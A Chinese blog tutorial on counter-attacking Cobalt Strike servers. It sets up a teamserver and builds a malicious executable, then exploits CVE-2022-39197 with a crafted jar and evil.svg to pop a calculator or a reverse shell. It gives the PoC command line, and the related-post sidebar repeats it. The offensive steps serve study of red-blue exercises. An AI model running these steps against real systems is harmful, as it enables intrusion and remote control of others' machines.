CS-反制

已于 2024-06-02 15:18:55 修改
阅读量462 收藏 7
点赞数 5
文章标签: CS反制 安全
于 2024-05-30 17:41:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/x88125E/article/details/139320816
版权

一、前置

1、权限更改,以便启动服务器端:chmod 777 *

2、启动服务器端

在当前目录下:./teamserver 192.168.228.129 pass

  • IP地址为本地IP地址,即启动服务器的那台主机IP
  • pass为连接密码

3、启动客户端:双击批处理文件(需要jdk环境)--》连接

4、生成恶意程序

  • 创建监听器:cs按钮--》监听器--》添加--》添加HTTP地址(保持默认的即可),端口更改

  • 生成恶意程序:有效载荷按钮--》  选择可执行程序 --》选择监听器---》确定---》保存文件

5、将恶意程序通过一些方式上传,运行

二、CS反制-远程控制工具启动

1、影响版本:CS<4.7.1

2、利用漏洞(CVE-2022-39197)

  • 编辑恶意文件内容,路径为EvilJar/src/main/java/Exploit.java

  • 使用Maven将文件打包,会在target目录下生成.jar的文件

  • 复制生成的文件到serve目录下,目录下有evil.svg文件

  • 修改evil.svg的文件内容

  • 在serve目录下开启web服务并验证是否能访问:python -m http.server 8888

  • 将恶意程序放到cve-2022-39197.py同一目录下(恶意程序名称要与py文件下的名字一致)
  • 执行POC:python cve-2022-39197.py beacon.exe http://IP地址:端口/evil.svg
  • cs服务器执行人员恰好查看系统进程时就会触发计算器

三、CS反制-反弹shell

1、双方开CS服务器,客户端

2、生成恶意程序:有效载荷按钮--》  选择payload生成器--》选择监听器--》选择输出格式:cmd

3、将生成的文件内容复制到Exploit.java文件的执行命令处,编译生成.jar工具

4、与上面步骤一致

x88125E
关注
专栏目录
CS反制-CS服务器新特征
Gamma_lab的博客
03-12 4495
CobaltStrike是一款基于Java编写的全平台多方协同后渗透攻击框架,几乎覆盖了APT攻击链中所需要用到的各个技术环节。 基本描述 CobaltStrike的HTTP(S)监听器对请求URL未进行"/"开头验证,攻击者可通过指定URL获取相关信息。 有效载荷 GET stager HTTP/1.1 Host: x.x.x.x User-Agent: Mozilla/5.0 测试过程 影响范围 CobaltStrike <= 4.5 该特征已申请了CVE! 最后 HW临近,公众
朔源反制cs流量分析
wuqingsix的博客
02-19 1292
弱特征:url headers format 这些需要自己更改配置文件在控制端temview的时候配置文件profile参数。强特征:TCP数据包中含有ja3,ja3s中的值为强特征 C hello S hello。wireshrk 筛选出符合本机通信与木马通信端的TLSv1的协议。进行wireshrk抓包筛选http 可获得一些cs独有的特征。测试http上线检测:eth0为监听的网卡 yaml为规则。强特征:请求含有checksum8规则的路径。基础特征:魔改的基本都会改。
反制burpsuit RCE上线CS
qq_40773698的博客
05-11 1223
0x00前言: Burp Suite的反制原理是利用低版本的chrome浏览器漏洞来触发命令执行达到反制的效果,Headless Chrome是谷歌Chrome浏览器的无界面模式,通过命令行方式打开网页并渲染,常用于自动化测试、网站爬虫、网站截图、XSS检测等场景。攻击者可以利用这些缺陷攻击客户端应用以达到命令执行效果。 0x01触发条件: Burp Suite v2.0的Live audit from Proxy被动扫描功能在默认情况下开启JavaScript分析引擎(JavaScr
应急响应-战中反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
siu~
04-11 825
知识点 战中-反制-安全工具篇 CS反制(有版本限制) Goby反制(有版本限制,新版goby已修复) Antsword反制(有版本限制,别人也不一定用蚁剑) AWVS反制(有版本限制,在awvs 10版本存在) BURP反制(有版本限制,在2020以下版本存在) SQLMAP反制(对于老手而言有点难,特征较为明显) XSS钓鱼 蜜罐反制
对正在打野发育的红队同学的一次反制
Love&Share
12-08 1581
文章目录故事开始其他反制思路隐蔽C2CS重定向器实验 故事开始 真的是对同学的反制哈,我们最近都在学习内网&钓鱼就互相”攻击“,就有那么一天我就在想我偷懒把CS登录密码设置的很简单,会不会其它人也偷懒,于是就抱着尝试的心态把手伸向了”Jerry同学“,谁让她上次钓鱼来着,历历在目,我是链接 穷学生么,一般学习就拿自己的云服务器了,她的CS TeamServer肯定就搭建在服务器上了 尝试用自己的CS Client连接 主机就是她博客域名,啥用户名、端口就默认,估计也懒得改 接下来就是激动人心的.
hack-cs-1.6-eV0L:ImGui的Counter-Strike 1.6骇客
04-24
- **反作弊系统**:CS 1.6有内置的反作弊机制,例如VAC(Valve Anti-Cheat),用于检测并封禁作弊玩家。使用ImGui进行非法修改可能触发这些机制。 - **社区规则**:除了官方反作弊,许多服务器和社区也有自己的反...
红队系列-溯源与应急反制专题
aming小老弟
11-09 510
日志分析、流量特征分析、内存马。
Adobe-AfterEffects-CS6-amtlib
05-06
这个动态链接库文件允许程序处理Adobe的激活系统,特别是其基于AMT(Adobe满载技术)的反盗版机制。当用户安装并启动After Effects时,amtlib.dll会验证软件的合法性,如果找到有效的许可证信息,软件就能正常运行。...
CS反制之批量伪装上线
bring_coco的博客
02-10 790
CS反制之批量伪装上线
【应急响应】战中溯源反制&对抗上线CS&Goby&蚁剑&Sqlmap等安全工具
今天是几号的博客
04-20 1928
CS反制 Goby反制 Antsword反制 AWVS反制 BURP反制 SQLMAP反制 XSS钓鱼 蜜罐反制。前面准备工作都是一气呵成,这里有个一很坑的地方就是使用pip安装Frida module时,一开始安装总是报错(tiemout以及各种问题),然后我不停的换Pytthon版本emmm,最后解决是使用超级管理员权限运行cmd就好了(心中无数个?) ```bash python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.sv
第19篇:关于近期cs服务端被反打的原因分析
ABC_123的博客
08-08 1786
Part1 前言最近几天,不少朋友的cs服务端被反打了,相信很多网友都知道了,大家也都在讨论,各种各样说法都有。具体事件描述如下:部分网友的cs服务端被不明攻击者拿下权限,之后攻击者将cs上的shell全部通过云函数的方式反弹到自己的cs上,之后将原有cs端的shell权限清空,在cs控制台留下一句话“CS RCE全版本通杀 Please v Me 获取详情”等之类的...
cobaltstrike反制神器
问题很多的小明
09-20 2083
git地址: https://github.com/hariomenkel/CobaltSpam 需要下载的依赖: pip3 install PySocks pip3 install stem pip3install requests pip3 install rstr 依次安装 根据python3执行报错缺少的依赖依次安装。遇到pip3 install M2Crypto,mac环境下需要执行安装xcode-select --install 然后安装swig 执行:python3 sp..
红蓝对抗-反制
热门推荐
Shanfenglan's blog
01-19 6万+
CATALOG1.前言2. 1.前言 初次接触反制技术,写一个文档作为记录。 2.
反制学习:Cobalt Strike批量上线
crowsec
02-11 2057
Cobalt Strike近些年来被称之为多人线上运动神器,在目前攻防大背景下,由Cobalt Strike展开的红蓝对抗技术不断积累,其中域前置技术、修改特征等手段来躲避各种流量检测工具,而Cobalt Strike的特征识别也成为网络空间测绘引擎重点关照的点,而且各种威胁情报中,对于Cobalt Strike的特征标记也最常见。 如果在我们实战攻防中,遇到了红队使用Cobalt Strike来钓鱼等操作时,我们如何在短时间内扰乱红队,甚至将红队的Cobalt Strike服务器宕
网络安全概述:从认知到实践
l1x1n0的博客
10-04 495
网络安全:保护网络系统的硬件、软件及数据,确保其不受破坏、泄露或篡改。网络安全是一个不断发展的领域,需要个人、企业和国家共同努力。提高安全意识,掌握基本防护技能,遵守相关法律法规,是每个网络用户应尽的责任。同时,网络安全产业的快速发展也为相关人才提供了广阔的职业前景。
如何安全地大规模部署 GenAI 应用程序
最新发布
网络研究观
10-06 416
将生成式人工智能融入到你的商业模式中,既会带来新的风险,也会带来新的回报。以下是如何应对这些风险。
【蚂蚁HR-注册/登录安全分析报告】
09-28 1320
蚂蚁社保是武汉微蚁企业服务有限公司旗下的网站,主要提供五险一金的代缴、补缴、社保开户、社保挂靠和社保代理服务。该平台主要覆盖一二线城市,目前已覆盖13+城市。蚂蚁社保的特点是高度自动化和在线化,创始人团队致力于通过程序和硬件替代所有可以自动化的环节,从而最大限度地减少人为错误,作为头部的社保代缴平台, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
企业间图文档发放:如何在保障安全的同时提升效率?
文件数据安全交换
09-29 762
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。《Ftrans B2B企业间文件安全交换系统》仅需通用浏览器即可使用,用户界面清晰明了,功能操作和收发流程简单便捷,可快速在企业内外部推行,实现安全的图文档发放,极大降低用户学习成本,提升终端用户满意度,为企业内外部的业务协作提供保障。
安全服务面试
m0_74402888的博客
09-28 892
内网的计算机可向 Internet 上的其他计算机发送连接请求,但 Internet 上其他。个列表中的 IP 进行 SYN+ACK 的重试。明白这种攻击的基本原理,还是要从 TCP 连接建立的过程开始说起:大家都知道,TCP 与。的 IP 地址,如果攻击者以数万/秒的速度发送 SYN 报文,同时利用 SOCK_RAW。Internet 上的计算机,但 Internet 上的计算机无法访问局域网内的计算机。内网的计算机以 NAT(网络地址转换)协议,通过一个公共的网关访问 Internet。
Photoshop CS6教程:反白字制作步骤解析
"这篇教程是关于如何在Photoshop CS6中制作反白字,适合初学者,步骤清晰易懂。" 在Photoshop CS6中制作反白字是一个基础且实用的技能,通常用于设计中创建高对比度的文字效果。以下是详细步骤: 1. **创建白色...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值